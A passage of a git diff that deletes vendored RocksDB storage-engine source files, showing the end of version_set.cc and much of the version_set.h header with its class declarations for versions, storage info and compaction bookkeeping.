-                cfd->table_cache(), read_options, env_options_compactions_,
-                cfd->internal_comparator(),
-                nullptr /* no per level latency histogram */,
-                true /* for_compaction */, false /* prefix enabled */,
-                false /* skip_filters */, (int)which /* level */,
-                range_del_agg),
-            new LevelFileNumIterator(cfd->internal_comparator(),
-                                     c->input_levels(which),
-                                     false /* don't sample compaction */));
-      }
-    }
-  }
-  assert(num <= space);
-  InternalIterator* result =
-      NewMergingIterator(&c->column_family_data()->internal_comparator(), list,
-                         static_cast<int>(num));
-  delete[] list;
-  return result;
-}
-
-// verify that the files listed in this compaction are present
-// in the current version
-bool VersionSet::VerifyCompactionFileConsistency(Compaction* c) {
-#ifndef NDEBUG
-  Version* version = c->column_family_data()->current();
-  const VersionStorageInfo* vstorage = version->storage_info();
-  if (c->input_version() != version) {
-    ROCKS_LOG_INFO(
-        db_options_->info_log,
-        "[%s] compaction output being applied to a different base version from"
-        " input version",
-        c->column_family_data()->GetName().c_str());
-
-    if (vstorage->compaction_style_ == kCompactionStyleLevel &&
-        c->start_level() == 0 && c->num_input_levels() > 2U) {
-      // We are doing a L0->base_level compaction. The assumption is if
-      // base level is not L1, levels from L1 to base_level - 1 is empty.
-      // This is ensured by having one compaction from L0 going on at the
-      // same time in level-based compaction. So that during the time, no
-      // compaction/flush can put files to those levels.
-      for (int l = c->start_level() + 1; l < c->output_level(); l++) {
-        if (vstorage->NumLevelFiles(l) != 0) {
-          return false;
-        }
-      }
-    }
-  }
-
-  for (size_t input = 0; input < c->num_input_levels(); ++input) {
-    int level = c->level(input);
-    for (size_t i = 0; i < c->num_input_files(input); ++i) {
-      uint64_t number = c->input(input, i)->fd.GetNumber();
-      bool found = false;
-      for (size_t j = 0; j < vstorage->files_[level].size(); j++) {
-        FileMetaData* f = vstorage->files_[level][j];
-        if (f->fd.GetNumber() == number) {
-          found = true;
-          break;
-        }
-      }
-      if (!found) {
-        return false;  // input files non existent in current version
-      }
-    }
-  }
-#endif
-  return true;     // everything good
-}
-
-Status VersionSet::GetMetadataForFile(uint64_t number, int* filelevel,
-                                      FileMetaData** meta,
-                                      ColumnFamilyData** cfd) {
-  for (auto cfd_iter : *column_family_set_) {
-    if (!cfd_iter->initialized()) {
-      continue;
-    }
-    Version* version = cfd_iter->current();
-    const auto* vstorage = version->storage_info();
-    for (int level = 0; level < vstorage->num_levels(); level++) {
-      for (const auto& file : vstorage->LevelFiles(level)) {
-        if (file->fd.GetNumber() == number) {
-          *meta = file;
-          *filelevel = level;
-          *cfd = cfd_iter;
-          return Status::OK();
-        }
-      }
-    }
-  }
-  return Status::NotFound("File not present in any level");
-}
-
-void VersionSet::GetLiveFilesMetaData(std::vector<LiveFileMetaData>* metadata) {
-  for (auto cfd : *column_family_set_) {
-    if (cfd->IsDropped() || !cfd->initialized()) {
-      continue;
-    }
-    for (int level = 0; level < cfd->NumberLevels(); level++) {
-      for (const auto& file :
-           cfd->current()->storage_info()->LevelFiles(level)) {
-        LiveFileMetaData filemetadata;
-        filemetadata.column_family_name = cfd->GetName();
-        uint32_t path_id = file->fd.GetPathId();
-        if (path_id < db_options_->db_paths.size()) {
-          filemetadata.db_path = db_options_->db_paths[path_id].path;
-        } else {
-          assert(!db_options_->db_paths.empty());
-          filemetadata.db_path = db_options_->db_paths.back().path;
-        }
-        filemetadata.name = MakeTableFileName("", file->fd.GetNumber());
-        filemetadata.level = level;
-        filemetadata.size = file->fd.GetFileSize();
-        filemetadata.smallestkey = file->smallest.user_key().ToString();
-        filemetadata.largestkey = file->largest.user_key().ToString();
-        filemetadata.smallest_seqno = file->smallest_seqno;
-        filemetadata.largest_seqno = file->largest_seqno;
-        metadata->push_back(filemetadata);
-      }
-    }
-  }
-}
-
-void VersionSet::GetObsoleteFiles(std::vector<FileMetaData*>* files,
-                                  std::vector<std::string>* manifest_filenames,
-                                  uint64_t min_pending_output) {
-  assert(manifest_filenames->empty());
-  obsolete_manifests_.swap(*manifest_filenames);
-  std::vector<FileMetaData*> pending_files;
-  for (auto f : obsolete_files_) {
-    if (f->fd.GetNumber() < min_pending_output) {
-      files->push_back(f);
-    } else {
-      pending_files.push_back(f);
-    }
-  }
-  obsolete_files_.swap(pending_files);
-}
-
-ColumnFamilyData* VersionSet::CreateColumnFamily(
-    const ColumnFamilyOptions& cf_options, VersionEdit* edit) {
-  assert(edit->is_column_family_add_);
-
-  Version* dummy_versions = new Version(nullptr, this);
-  // Ref() dummy version once so that later we can call Unref() to delete it
-  // by avoiding calling "delete" explicitly (~Version is private)
-  dummy_versions->Ref();
-  auto new_cfd = column_family_set_->CreateColumnFamily(
-      edit->column_family_name_, edit->column_family_, dummy_versions,
-      cf_options);
-
-  Version* v = new Version(new_cfd, this, current_version_number_++);
-
-  // Fill level target base information.
-  v->storage_info()->CalculateBaseBytes(*new_cfd->ioptions(),
-                                        *new_cfd->GetLatestMutableCFOptions());
-  AppendVersion(new_cfd, v);
-  // GetLatestMutableCFOptions() is safe here without mutex since the
-  // cfd is not available to client
-  new_cfd->CreateNewMemtable(*new_cfd->GetLatestMutableCFOptions(),
-                             LastSequence());
-  new_cfd->SetLogNumber(edit->log_number_);
-  return new_cfd;
-}
-
-uint64_t VersionSet::GetNumLiveVersions(Version* dummy_versions) {
-  uint64_t count = 0;
-  for (Version* v = dummy_versions->next_; v != dummy_versions; v = v->next_) {
-    count++;
-  }
-  return count;
-}
-
-uint64_t VersionSet::GetTotalSstFilesSize(Version* dummy_versions) {
-  std::unordered_set<uint64_t> unique_files;
-  uint64_t total_files_size = 0;
-  for (Version* v = dummy_versions->next_; v != dummy_versions; v = v->next_) {
-    VersionStorageInfo* storage_info = v->storage_info();
-    for (int level = 0; level < storage_info->num_levels_; level++) {
-      for (const auto& file_meta : storage_info->LevelFiles(level)) {
-        if (unique_files.find(file_meta->fd.packed_number_and_path_id) ==
-            unique_files.end()) {
-          unique_files.insert(file_meta->fd.packed_number_and_path_id);
-          total_files_size += file_meta->fd.GetFileSize();
-        }
-      }
-    }
-  }
-  return total_files_size;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/version_set.h b/thirdparty/rocksdb/db/version_set.h
deleted file mode 100644
index 5862dea..0000000
--- a/thirdparty/rocksdb/db/version_set.h
+++ /dev/null
@@ -1,863 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// The representation of a DBImpl consists of a set of Versions.  The
-// newest version is called "current".  Older versions may be kept
-// around to provide a consistent view to live iterators.
-//
-// Each Version keeps track of a set of Table files per level.  The
-// entire set of versions is maintained in a VersionSet.
-//
-// Version,VersionSet are thread-compatible, but require external
-// synchronization on all accesses.
-
-#pragma once
-#include <atomic>
-#include <deque>
-#include <limits>
-#include <map>
-#include <memory>
-#include <set>
-#include <string>
-#include <utility>
-#include <vector>
-
-#include "db/column_family.h"
-#include "db/compaction.h"
-#include "db/compaction_picker.h"
-#include "db/dbformat.h"
-#include "db/file_indexer.h"
-#include "db/log_reader.h"
-#include "db/range_del_aggregator.h"
-#include "db/table_cache.h"
-#include "db/version_builder.h"
-#include "db/version_edit.h"
-#include "db/write_controller.h"
-#include "monitoring/instrumented_mutex.h"
-#include "options/db_options.h"
-#include "port/port.h"
-#include "rocksdb/env.h"
-
-namespace rocksdb {
-
-namespace log {
-class Writer;
-}
-
-class Compaction;
-class InternalIterator;
-class LogBuffer;
-class LookupKey;
-class MemTable;
-class Version;
-class VersionSet;
-class WriteBufferManager;
-class MergeContext;
-class ColumnFamilySet;
-class TableCache;
-class MergeIteratorBuilder;
-
-// Return the smallest index i such that file_level.files[i]->largest >= key.
-// Return file_level.num_files if there is no such file.
-// REQUIRES: "file_level.files" contains a sorted list of
-// non-overlapping files.
-extern int FindFile(const InternalKeyComparator& icmp,
-                    const LevelFilesBrief& file_level, const Slice& key);
-
-// Returns true iff some file in "files" overlaps the user key range
-// [*smallest,*largest].
-// smallest==nullptr represents a key smaller than all keys in the DB.
-// largest==nullptr represents a key largest than all keys in the DB.
-// REQUIRES: If disjoint_sorted_files, file_level.files[]
-// contains disjoint ranges in sorted order.
-extern bool SomeFileOverlapsRange(const InternalKeyComparator& icmp,
-                                  bool disjoint_sorted_files,
-                                  const LevelFilesBrief& file_level,
-                                  const Slice* smallest_user_key,
-                                  const Slice* largest_user_key);
-
-// Generate LevelFilesBrief from vector<FdWithKeyRange*>
-// Would copy smallest_key and largest_key data to sequential memory
-// arena: Arena used to allocate the memory
-extern void DoGenerateLevelFilesBrief(LevelFilesBrief* file_level,
-                                      const std::vector<FileMetaData*>& files,
-                                      Arena* arena);
-
-class VersionStorageInfo {
- public:
-  VersionStorageInfo(const InternalKeyComparator* internal_comparator,
-                     const Comparator* user_comparator, int num_levels,
-                     CompactionStyle compaction_style,
-                     VersionStorageInfo* src_vstorage,
-                     bool _force_consistency_checks);
-  ~VersionStorageInfo();
-
-  void Reserve(int level, size_t size) { files_[level].reserve(size); }
-
-  void AddFile(int level, FileMetaData* f, Logger* info_log = nullptr);
-
-  void SetFinalized();
-
-  // Update num_non_empty_levels_.
-  void UpdateNumNonEmptyLevels();
-
-  void GenerateFileIndexer() {
-    file_indexer_.UpdateIndex(&arena_, num_non_empty_levels_, files_);
-  }
-
-  // Update the accumulated stats from a file-meta.
-  void UpdateAccumulatedStats(FileMetaData* file_meta);
-
-  // Decrease the current stat form a to-be-delected file-meta
-  void RemoveCurrentStats(FileMetaData* file_meta);
-
-  void ComputeCompensatedSizes();
-
-  // Updates internal structures that keep track of compaction scores
-  // We use compaction scores to figure out which compaction to do next
-  // REQUIRES: db_mutex held!!
-  // TODO find a better way to pass compaction_options_fifo.
-  void ComputeCompactionScore(const ImmutableCFOptions& immutable_cf_options,
-                              const MutableCFOptions& mutable_cf_options);
-
-  // Estimate est_comp_needed_bytes_
-  void EstimateCompactionBytesNeeded(
-      const MutableCFOptions& mutable_cf_options);
-
-  // This computes files_marked_for_compaction_ and is called by
-  // ComputeCompactionScore()
-  void ComputeFilesMarkedForCompaction();
-
-  // Generate level_files_brief_ from files_
-  void GenerateLevelFilesBrief();
-  // Sort all files for this version based on their file size and
-  // record results in files_by_compaction_pri_. The largest files are listed
-  // first.
-  void UpdateFilesByCompactionPri(CompactionPri compaction_pri);
-
-  void GenerateLevel0NonOverlapping();
-  bool level0_non_overlapping() const {
-    return level0_non_overlapping_;
-  }
-
-  int MaxInputLevel() const;
-  int MaxOutputLevel(bool allow_ingest_behind) const;
-
-  // Return level number that has idx'th highest score
-  int CompactionScoreLevel(int idx) const { return compaction_level_[idx]; }
-
-  // Return idx'th highest score
-  double CompactionScore(int idx) const { return compaction_score_[idx]; }
-
-  void GetOverlappingInputs(
-      int level, const InternalKey* begin,  // nullptr means before all keys
-      const InternalKey* end,               // nullptr means after all keys
-      std::vector<FileMetaData*>* inputs,
-      int hint_index = -1,        // index of overlap file
-      int* file_index = nullptr,  // return index of overlap file
-      bool expand_range = true)   // if set, returns files which overlap the
-      const;                      // range and overlap each other. If false,
-                                  // then just files intersecting the range
-  void GetCleanInputsWithinInterval(
-      int level, const InternalKey* begin,  // nullptr means before all keys
-      const InternalKey* end,               // nullptr means after all keys
-      std::vector<FileMetaData*>* inputs,
-      int hint_index = -1,        // index of overlap file
-      int* file_index = nullptr)  // return index of overlap file
-      const;
-
-  void GetOverlappingInputsRangeBinarySearch(
-      int level,           // level > 0
-      const Slice& begin,  // nullptr means before all keys
-      const Slice& end,    // nullptr means after all keys
-      std::vector<FileMetaData*>* inputs,
-      int hint_index,                // index of overlap file
-      int* file_index,               // return index of overlap file
-      bool within_interval = false)  // if set, force the inputs within interval
-      const;
-
-  void ExtendFileRangeOverlappingInterval(
-      int level,
-      const Slice& begin,  // nullptr means before all keys
-      const Slice& end,    // nullptr means after all keys
-      unsigned int index,  // start extending from this index
-      int* startIndex,     // return the startIndex of input range
-      int* endIndex)       // return the endIndex of input range
-      const;
-
-  void ExtendFileRangeWithinInterval(
-      int level,
-      const Slice& begin,  // nullptr means before all keys
-      const Slice& end,    // nullptr means after all keys
-      unsigned int index,  // start extending from this index
-      int* startIndex,     // return the startIndex of input range
-      int* endIndex)       // return the endIndex of input range
-      const;
-
-  // Returns true iff some file in the specified level overlaps
-  // some part of [*smallest_user_key,*largest_user_key].
-  // smallest_user_key==NULL represents a key smaller than all keys in the DB.
-  // largest_user_key==NULL represents a key largest than all keys in the DB.
-  bool OverlapInLevel(int level, const Slice* smallest_user_key,
-                      const Slice* largest_user_key);
-
-  // Returns true iff the first or last file in inputs contains
-  // an overlapping user key to the file "just outside" of it (i.e.
-  // just after the last file, or just before the first file)
-  // REQUIRES: "*inputs" is a sorted list of non-overlapping files
-  bool HasOverlappingUserKey(const std::vector<FileMetaData*>* inputs,
-                             int level);
-
-  int num_levels() const { return num_levels_; }
-
-  // REQUIRES: This version has been saved (see VersionSet::SaveTo)
-  int num_non_empty_levels() const {
-    assert(finalized_);
-    return num_non_empty_levels_;
-  }
-
-  // REQUIRES: This version has been finalized.
-  // (CalculateBaseBytes() is called)
-  // This may or may not return number of level files. It is to keep backward
-  // compatible behavior in universal compaction.
-  int l0_delay_trigger_count() const { return l0_delay_trigger_count_; }
-
-  void set_l0_delay_trigger_count(int v) { l0_delay_trigger_count_ = v; }
-
-  // REQUIRES: This version has been saved (see VersionSet::SaveTo)
-  int NumLevelFiles(int level) const {
-    assert(finalized_);
-    return static_cast<int>(files_[level].size());
-  }
-
-  // Return the combined file size of all files at the specified level.
-  uint64_t NumLevelBytes(int level) const;
-
-  // REQUIRES: This version has been saved (see VersionSet::SaveTo)
-  const std::vector<FileMetaData*>& LevelFiles(int level) const {
-    return files_[level];
-  }
-
-  const rocksdb::LevelFilesBrief& LevelFilesBrief(int level) const {
-    assert(level < static_cast<int>(level_files_brief_.size()));
-    return level_files_brief_[level];
-  }
-
-  // REQUIRES: This version has been saved (see VersionSet::SaveTo)
-  const std::vector<int>& FilesByCompactionPri(int level) const {
-    assert(finalized_);
-    return files_by_compaction_pri_[level];
-  }
-
-  // REQUIRES: This version has been saved (see VersionSet::SaveTo)
-  // REQUIRES: DB mutex held during access
-  const autovector<std::pair<int, FileMetaData*>>& FilesMarkedForCompaction()
-      const {
-    assert(finalized_);
-    return files_marked_for_compaction_;
-  }
-
-  int base_level() const { return base_level_; }
-
-  // REQUIRES: lock is held
-  // Set the index that is used to offset into files_by_compaction_pri_ to find
-  // the next compaction candidate file.
-  void SetNextCompactionIndex(int level, int index) {
-    next_file_to_compact_by_size_[level] = index;
-  }
-
-  // REQUIRES: lock is held
-  int NextCompactionIndex(int level) const {
-    return next_file_to_compact_by_size_[level];
-  }
-
-  // REQUIRES: This version has been saved (see VersionSet::SaveTo)
-  const FileIndexer& file_indexer() const {
-    assert(finalized_);
-    return file_indexer_;
-  }
-
-  // Only the first few entries of files_by_compaction_pri_ are sorted.
-  // There is no need to sort all the files because it is likely
-  // that on a running system, we need to look at only the first
-  // few largest files because a new version is created every few
-  // seconds/minutes (because of concurrent compactions).
-  static const size_t kNumberFilesToSort = 50;
-
-  // Return a human-readable short (single-line) summary of the number
-  // of files per level.  Uses *scratch as backing store.
-  struct LevelSummaryStorage {
-    char buffer[1000];
-  };
-  struct FileSummaryStorage {
-    char buffer[3000];
-  };
-  const char* LevelSummary(LevelSummaryStorage* scratch) const;
-  // Return a human-readable short (single-line) summary of files
-  // in a specified level.  Uses *scratch as backing store.
-  const char* LevelFileSummary(FileSummaryStorage* scratch, int level) const;
-
-  // Return the maximum overlapping data (in bytes) at next level for any
-  // file at a level >= 1.
-  int64_t MaxNextLevelOverlappingBytes();
-
-  // Return a human readable string that describes this version's contents.
-  std::string DebugString(bool hex = false) const;
-
-  uint64_t GetAverageValueSize() const {
-    if (accumulated_num_non_deletions_ == 0) {
-      return 0;
-    }
-    assert(accumulated_raw_key_size_ + accumulated_raw_value_size_ > 0);
-    assert(accumulated_file_size_ > 0);
-    return accumulated_raw_value_size_ / accumulated_num_non_deletions_ *
-           accumulated_file_size_ /
-           (accumulated_raw_key_size_ + accumulated_raw_value_size_);
-  }
-
-  uint64_t GetEstimatedActiveKeys() const;
-
-  double GetEstimatedCompressionRatioAtLevel(int level) const;
-
-  // re-initializes the index that is used to offset into
-  // files_by_compaction_pri_
-  // to find the next compaction candidate file.
-  void ResetNextCompactionIndex(int level) {
-    next_file_to_compact_by_size_[level] = 0;
-  }
-
-  const InternalKeyComparator* InternalComparator() {
-    return internal_comparator_;
-  }
-
-  // Returns maximum total bytes of data on a given level.
-  uint64_t MaxBytesForLevel(int level) const;
-
-  // Must be called after any change to MutableCFOptions.
-  void CalculateBaseBytes(const ImmutableCFOptions& ioptions,
-                          const MutableCFOptions& options);
-
-  // Returns an estimate of the amount of live data in bytes.
-  uint64_t EstimateLiveDataSize() const;
-
-  uint64_t estimated_compaction_needed_bytes() const {
-    return estimated_compaction_needed_bytes_;
-  }
-
-  void TEST_set_estimated_compaction_needed_bytes(uint64_t v) {
-    estimated_compaction_needed_bytes_ = v;
-  }
-
-  bool force_consistency_checks() const { return force_consistency_checks_; }
-
- private:
-  const InternalKeyComparator* internal_comparator_;
-  const Comparator* user_comparator_;
-  int num_levels_;            // Number of levels
-  int num_non_empty_levels_;  // Number of levels. Any level larger than it
-                              // is guaranteed to be empty.
-  // Per-level max bytes
-  std::vector<uint64_t> level_max_bytes_;
-
-  // A short brief metadata of files per level
-  autovector<rocksdb::LevelFilesBrief> level_files_brief_;
-  FileIndexer file_indexer_;
-  Arena arena_;  // Used to allocate space for file_levels_
-
-  CompactionStyle compaction_style_;
-
-  // List of files per level, files in each level are arranged
-  // in increasing order of keys
-  std::vector<FileMetaData*>* files_;
-
-  // Level that L0 data should be compacted to. All levels < base_level_ should
-  // be empty. -1 if it is not level-compaction so it's not applicable.
-  int base_level_;
-
-  // A list for the same set of files that are stored in files_,
-  // but files in each level are now sorted based on file
-  // size. The file with the largest size is at the front.
-  // This vector stores the index of the file from files_.
-  std::vector<std::vector<int>> files_by_compaction_pri_;
-
-  // If true, means that files in L0 have keys with non overlapping ranges
-  bool level0_non_overlapping_;
-
-  // An index into files_by_compaction_pri_ that specifies the first
-  // file that is not yet compacted
-  std::vector<int> next_file_to_compact_by_size_;
-
-  // Only the first few entries of files_by_compaction_pri_ are sorted.
-  // There is no need to sort all the files because it is likely
-  // that on a running system, we need to look at only the first
-  // few largest files because a new version is created every few
-  // seconds/minutes (because of concurrent compactions).
-  static const size_t number_of_files_to_sort_ = 50;
-
-  // This vector contains list of files marked for compaction and also not
-  // currently being compacted. It is protected by DB mutex. It is calculated in
-  // ComputeCompactionScore()
-  autovector<std::pair<int, FileMetaData*>> files_marked_for_compaction_;
-
-  // Level that should be compacted next and its compaction score.
-  // Score < 1 means compaction is not strictly needed.  These fields
-  // are initialized by Finalize().
-  // The most critical level to be compacted is listed first
-  // These are used to pick the best compaction level
-  std::vector<double> compaction_score_;
-  std::vector<int> compaction_level_;
-  int l0_delay_trigger_count_ = 0;  // Count used to trigger slow down and stop
-                                    // for number of L0 files.
-
-  // the following are the sampled temporary stats.
-  // the current accumulated size of sampled files.
-  uint64_t accumulated_file_size_;
-  // the current accumulated size of all raw keys based on the sampled files.
-  uint64_t accumulated_raw_key_size_;
-  // the current accumulated size of all raw keys based on the sampled files.
-  uint64_t accumulated_raw_value_size_;
-  // total number of non-deletion entries
-  uint64_t accumulated_num_non_deletions_;
-  // total number of deletion entries
-  uint64_t accumulated_num_deletions_;
-  // current number of non_deletion entries
-  uint64_t current_num_non_deletions_;
-  // current number of delection entries
-  uint64_t current_num_deletions_;
-  // current number of file samples
-  uint64_t current_num_samples_;
-  // Estimated bytes needed to be compacted until all levels' size is down to
-  // target sizes.
-  uint64_t estimated_compaction_needed_bytes_;
-
-  bool finalized_;
-
-  // If set to true, we will run consistency checks even if RocksDB
-  // is compiled in release mode
-  bool force_consistency_checks_;
-
-  friend class Version;
-  friend class VersionSet;
-  // No copying allowed
-  VersionStorageInfo(const VersionStorageInfo&) = delete;
-  void operator=(const VersionStorageInfo&) = delete;
-};
-
-class Version {
- public:
-  // Append to *iters a sequence of iterators that will
-  // yield the contents of this Version when merged together.
-  // REQUIRES: This version has been saved (see VersionSet::SaveTo)
-  void AddIterators(const ReadOptions&, const EnvOptions& soptions,
-                    MergeIteratorBuilder* merger_iter_builder,
-                    RangeDelAggregator* range_del_agg);
-
-  void AddIteratorsForLevel(const ReadOptions&, const EnvOptions& soptions,
-                            MergeIteratorBuilder* merger_iter_builder,
-                            int level, RangeDelAggregator* range_del_agg);
-
-  void AddRangeDelIteratorsForLevel(
-      const ReadOptions& read_options, const EnvOptions& soptions, int level,
-      std::vector<InternalIterator*>* range_del_iters);
-
-  // Lookup the value for key.  If found, store it in *val and
-  // return OK.  Else return a non-OK status.
-  // Uses *operands to store merge_operator operations to apply later.
-  //
-  // If the ReadOptions.read_tier is set to do a read-only fetch, then
-  // *value_found will be set to false if it cannot be determined whether
-  // this value exists without doing IO.
-  //
-  // If the key is Deleted, *status will be set to NotFound and
-  //                        *key_exists will be set to true.
-  // If no key was found, *status will be set to NotFound and
-  //                      *key_exists will be set to false.
-  // If seq is non-null, *seq will be set to the sequence number found
-  // for the key if a key was found.
-  //
-  // REQUIRES: lock is not held
-  void Get(const ReadOptions&, const LookupKey& key, PinnableSlice* value,
-           Status* status, MergeContext* merge_context,
-           RangeDelAggregator* range_del_agg, bool* value_found = nullptr,
-           bool* key_exists = nullptr, SequenceNumber* seq = nullptr,
-           bool* is_blob = nullptr);
-
-  // Loads some stats information from files. Call without mutex held. It needs
-  // to be called before applying the version to the version set.
-  void PrepareApply(const MutableCFOptions& mutable_cf_options,
-                    bool update_stats);
-
-  // Reference count management (so Versions do not disappear out from
-  // under live iterators)
-  void Ref();
-  // Decrease reference count. Delete the object if no reference left
-  // and return true. Otherwise, return false.
-  bool Unref();
-
-  // Add all files listed in the current version to *live.
-  void AddLiveFiles(std::vector<FileDescriptor>* live);
-
-  // Return a human readable string that describes this version's contents.
-  std::string DebugString(bool hex = false, bool print_stats = false) const;
-
-  // Returns the version nuber of this version
-  uint64_t GetVersionNumber() const { return version_number_; }
-
-  // REQUIRES: lock is held
-  // On success, "tp" will contains the table properties of the file
-  // specified in "file_meta".  If the file name of "file_meta" is
-  // known ahread, passing it by a non-null "fname" can save a
-  // file-name conversion.
-  Status GetTableProperties(std::shared_ptr<const TableProperties>* tp,
-                            const FileMetaData* file_meta,
-                            const std::string* fname = nullptr) const;
-
-  // REQUIRES: lock is held
-  // On success, *props will be populated with all SSTables' table properties.
-  // The keys of `props` are the sst file name, the values of `props` are the
-  // tables' propertis, represented as shared_ptr.
-  Status GetPropertiesOfAllTables(TablePropertiesCollection* props);
-  Status GetPropertiesOfAllTables(TablePropertiesCollection* props, int level);
-  Status GetPropertiesOfTablesInRange(const Range* range, std::size_t n,
-                                      TablePropertiesCollection* props) const;
-
-  // REQUIRES: lock is held
-  // On success, "tp" will contains the aggregated table property amoug
-  // the table properties of all sst files in this version.
-  Status GetAggregatedTableProperties(
-      std::shared_ptr<const TableProperties>* tp, int level = -1);
-
-  uint64_t GetEstimatedActiveKeys() {
-    return storage_info_.GetEstimatedActiveKeys();
-  }
-
-  size_t GetMemoryUsageByTableReaders();
-
-  ColumnFamilyData* cfd() const { return cfd_; }
-
-  // Return the next Version in the linked list. Used for debug only
-  Version* TEST_Next() const {
-    return next_;
-  }
-
-  int TEST_refs() const { return refs_; }
-
-  VersionStorageInfo* storage_info() { return &storage_info_; }
-
-  VersionSet* version_set() { return vset_; }
-
-  void GetColumnFamilyMetaData(ColumnFamilyMetaData* cf_meta);
-
- private:
-  Env* env_;
-  friend class VersionSet;
-
-  const InternalKeyComparator* internal_comparator() const {
-    return storage_info_.internal_comparator_;
-  }
-  const Comparator* user_comparator() const {
-    return storage_info_.user_comparator_;
-  }
-
-  bool PrefixMayMatch(const ReadOptions& read_options,
-                      InternalIterator* level_iter,
-                      const Slice& internal_prefix) const;
-
-  // Returns true if the filter blocks in the specified level will not be
-  // checked during read operations. In certain cases (trivial move or preload),
-  // the filter block may already be cached, but we still do not access it such
-  // that it eventually expires from the cache.
-  bool IsFilterSkipped(int level, bool is_file_last_in_level = false);
-
-  // The helper function of UpdateAccumulatedStats, which may fill the missing
-  // fields of file_mata from its associated TableProperties.
-  // Returns true if it does initialize FileMetaData.
-  bool MaybeInitializeFileMetaData(FileMetaData* file_meta);
-
-  // Update the accumulated stats associated with the current version.
-  // This accumulated stats will be used in compaction.
-  void UpdateAccumulatedStats(bool update_stats);
-
-  // Sort all files for this version based on their file size and
-  // record results in files_by_compaction_pri_. The largest files are listed
-  // first.
-  void UpdateFilesByCompactionPri();
-
-  ColumnFamilyData* cfd_;  // ColumnFamilyData to which this Version belongs
-  Logger* info_log_;
-  Statistics* db_statistics_;
-  TableCache* table_cache_;
-  const MergeOperator* merge_operator_;
-
-  VersionStorageInfo storage_info_;
-  VersionSet* vset_;            // VersionSet to which this Version belongs
-  Version* next_;               // Next version in linked list
-  Version* prev_;               // Previous version in linked list
-  int refs_;                    // Number of live refs to this version
-
-  // A version number that uniquely represents this version. This is
-  // used for debugging and logging purposes only.
-  uint64_t version_number_;
-
-  Version(ColumnFamilyData* cfd, VersionSet* vset, uint64_t version_number = 0);
-
-  ~Version();
-
-  // No copying allowed
-  Version(const Version&);
-  void operator=(const Version&);
-};
-
-class VersionSet {
- public:
-  VersionSet(const std::string& dbname, const ImmutableDBOptions* db_options,
-             const EnvOptions& env_options, Cache* table_cache,
-             WriteBufferManager* write_buffer_manager,
-             WriteController* write_controller);
-  ~VersionSet();
-
-  // Apply *edit to the current version to form a new descriptor that
-  // is both saved to persistent state and installed as the new
-  // current version.  Will release *mu while actually writing to the file.
-  // column_family_options has to be set if edit is column family add
-  // REQUIRES: *mu is held on entry.
-  // REQUIRES: no other thread concurrently calls LogAndApply()
-  Status LogAndApply(
-      ColumnFamilyData* column_family_data,
-      const MutableCFOptions& mutable_cf_options, VersionEdit* edit,
-      InstrumentedMutex* mu, Directory* db_directory = nullptr,
-      bool new_descriptor_log = false,
-      const ColumnFamilyOptions* column_family_options = nullptr) {
-    autovector<VersionEdit*> edit_list;
-    edit_list.push_back(edit);
-    return LogAndApply(column_family_data, mutable_cf_options, edit_list, mu,
-                       db_directory, new_descriptor_log, column_family_options);
-  }
-  // The batch version. If edit_list.size() > 1, caller must ensure that
-  // no edit in the list column family add or drop
-  Status LogAndApply(
-      ColumnFamilyData* column_family_data,
-      const MutableCFOptions& mutable_cf_options,
-      const autovector<VersionEdit*>& edit_list, InstrumentedMutex* mu,
-      Directory* db_directory = nullptr, bool new_descriptor_log = false,
-      const ColumnFamilyOptions* column_family_options = nullptr);
-
-  // Recover the last saved descriptor from persistent storage.
-  // If read_only == true, Recover() will not complain if some column families
-  // are not opened
-  Status Recover(const std::vector<ColumnFamilyDescriptor>& column_families,
-                 bool read_only = false);
-
-  // Reads a manifest file and returns a list of column families in
-  // column_families.
-  static Status ListColumnFamilies(std::vector<std::string>* column_families,
-                                   const std::string& dbname, Env* env);
-
-#ifndef ROCKSDB_LITE
-  // Try to reduce the number of levels. This call is valid when
-  // only one level from the new max level to the old
-  // max level containing files.
-  // The call is static, since number of levels is immutable during
-  // the lifetime of a RocksDB instance. It reduces number of levels
-  // in a DB by applying changes to manifest.
-  // For example, a db currently has 7 levels [0-6], and a call to
-  // to reduce to 5 [0-4] can only be executed when only one level
-  // among [4-6] contains files.
-  static Status ReduceNumberOfLevels(const std::string& dbname,
-                                     const Options* options,
-                                     const EnvOptions& env_options,
-                                     int new_levels);
-
-  // printf contents (for debugging)
-  Status DumpManifest(Options& options, std::string& manifestFileName,
-                      bool verbose, bool hex = false, bool json = false);
-
-#endif  // ROCKSDB_LITE
-
-  // Return the current manifest file number
-  uint64_t manifest_file_number() const { return manifest_file_number_; }
-
-  uint64_t options_file_number() const { return options_file_number_; }
-
-  uint64_t pending_manifest_file_number() const {
-    return pending_manifest_file_number_;
-  }
-
-  uint64_t current_next_file_number() const { return next_file_number_.load(); }
-
-  // Allocate and return a new file number
-  uint64_t NewFileNumber() { return next_file_number_.fetch_add(1); }
-
-  // Return the last sequence number.
-  uint64_t LastSequence() const {
-    return last_sequence_.load(std::memory_order_acquire);
-  }
-
-  // Note: memory_order_acquire must be sufficient.
-  uint64_t LastToBeWrittenSequence() const {
-    return last_to_be_written_sequence_.load(std::memory_order_seq_cst);
-  }
-
-  // Set the last sequence number to s.
-  void SetLastSequence(uint64_t s) {
-    assert(s >= last_sequence_);
-    // Last visible seqeunce must always be less than last written seq
-    assert(!db_options_->concurrent_prepare ||
-           s <= last_to_be_written_sequence_);
-    last_sequence_.store(s, std::memory_order_release);
-  }
-
-  // Note: memory_order_release must be sufficient
-  void SetLastToBeWrittenSequence(uint64_t s) {
-    assert(s >= last_to_be_written_sequence_);
-    last_to_be_written_sequence_.store(s, std::memory_order_seq_cst);
-  }
-
-  // Note: memory_order_release must be sufficient
-  uint64_t FetchAddLastToBeWrittenSequence(uint64_t s) {
-    return last_to_be_written_sequence_.fetch_add(s, std::memory_order_seq_cst);
-  }
-
-  // Mark the specified file number as used.
-  // REQUIRED: this is only called during single-threaded recovery
-  void MarkFileNumberUsedDuringRecovery(uint64_t number);
-
-  // Return the log file number for the log file that is currently
-  // being compacted, or zero if there is no such log file.
-  uint64_t prev_log_number() const { return prev_log_number_; }
-
